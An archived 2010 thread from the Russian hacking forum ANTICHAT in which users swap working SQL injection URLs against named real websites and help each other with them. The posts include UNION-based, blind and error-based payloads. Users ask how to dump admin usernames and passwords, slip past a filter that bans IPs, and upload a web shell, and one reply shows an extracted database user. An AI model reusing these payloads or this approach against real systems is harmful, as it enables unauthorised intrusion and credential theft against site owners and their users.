ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.12.2010, 10:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
31258
Репутация:
7
|
|
Сообщение от FlaktW
FlaktW said:
Не получается вывести имя юзера.
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+se lect+user,null,null,null,null,null,null,null,null, null,null,null+from+sys.dual--
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+se lect+sys.login_user,null,null,null,null,null,null, null,null,null,null,null+from+sys.dual--
можно попробовать вслепую:
Код:
Code:
http://www.oeaw.ac.at/oeaw_servlet/PersonenDetailsGeneric?id=12361+AND+ASCII(SUBSTR((SELECT+SYS.LOGIN_USER+FROM+DUAL),1,1))=87
user:WWW
|
|
|
|
01.12.2010, 21:07
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Есть простенькая SQL-иньекция, но сайт фильтрует(и сразу банит айпишник) все урлы, в которых проскакивает слово "admin_".
Т.е. запрос
Код:
Code:
http://site.com/index.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,user,pass),3+from+admin_users/*
фильтруется. Остальные запросы идут без проблем. Идеи, как обойти?
Через POST скрипт параметры не берет. |
|
|
01.12.2010, 22:28
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073
Репутация:
44
|
|
Сообщение от Nek1t
Nek1t said:
Есть простенькая SQL-иньекция, но сайт фильтрует(и сразу банит айпишник)
все
урлы, в которых проскакивает слово "admin_".
Т.е. запрос
Код:
Code:
http://site.com/index.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,user,pass),3+from+admin_users/*
фильтруется. Остальные запросы идут без проблем. Идеи, как обойти?
Через POST скрипт параметры не берет. Линк в личку.
|
|
|
|
02.12.2010, 21:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от TreV@N
TreV@N said:
Смотри в title
http://www.truvor.ru/news.php?id_new=-91+union+select+1,2,3,4,version(),6,7,8,9--
спасибо, я вот хотел изнать названия колонок при помощи
information_shema но там написано што такой процес запрещон,
а што дальше в таком случае я могу сделать?
и дайте плиз ссылку на нормальную статью о там как при скуле залить шелл
|
|
|
|
02.12.2010, 21:30
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от qaz
qaz said:
спасибо, я вот хотел изнать названия колонок при помощи
information_shema но там написано што такой процес запрещон,
а што дальше в таком случае я могу сделать?
и дайте плиз ссылку на нормальную статью о там как при скуле залить шелл
уже милионный раз перемалывается этот вопрос, поиcком можете научится пользоватся? здец просто полнeйший..обленилась молодежь
|
|
|
|
04.12.2010, 14:37
|
|
Участник форума
Регистрация: 30.09.2007
Сообщений: 116
Провел на форуме:
140305
Репутация:
14
|
|
Кто знает как юзать вложенные запросы в мускул 4?)
Т.е имеем запрос
/**/or/**/1/**/group/**/by/**/concat(version(),floor(rand(0)*2))having/**/min(0)/**/or/**/1/*
все норм,Версию выведет,но попытаемся выдрать данные из существующей таблы admin допустим,летит эррор
ЗЫ:Интересно не мне одному
|
|
|
|
04.12.2010, 14:43
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от BaleHoK
BaleHoK said:
Кто знает как юзать вложенные запросы в мускул 4?)
Т.е имеем запрос
/**/or/**/1/**/group/**/by/**/concat(version(),floor(rand(0)*2))having/**/min(0)/**/or/**/1/*
все норм,Версию выведет,но попытаемся выдрать данные из существующей таблы admin допустим,летит эррор
ЗЫ:Интересно не мне одному
Подзапросы в MySQL начали поддерживаться начиная с версии 4.1
|
|
|
|
04.12.2010, 19:57
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Помогите определить версию БД.
http://www.procasapanama.com/detalle.php?id=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19+--+
|
|
|
|
04.12.2010, 20:10
|
|
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме:
792994
Репутация:
104
|
|
Сообщение от FlaktW
FlaktW said:
Помогите определить версию БД.
http://www.procasapanama.com/detalle.php?id=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19+--+
Здесь нет уязвимости
|
|
|
|
04.12.2010, 22:43
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Помогите найти:
1)Кол-во таблиц
2)пароль админа
http://www.alestilocuquita.com/descripcion.php?id=-347'+and+(select*from(select+count(*)from(select+1 +union+select+2+union+select+3)x+group+by+concat(m id((select+count(*)+from+INFORMATION_SCHEMA.TABLES +limit+1,1),1,64),floor(rand(0)*2)))z)+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
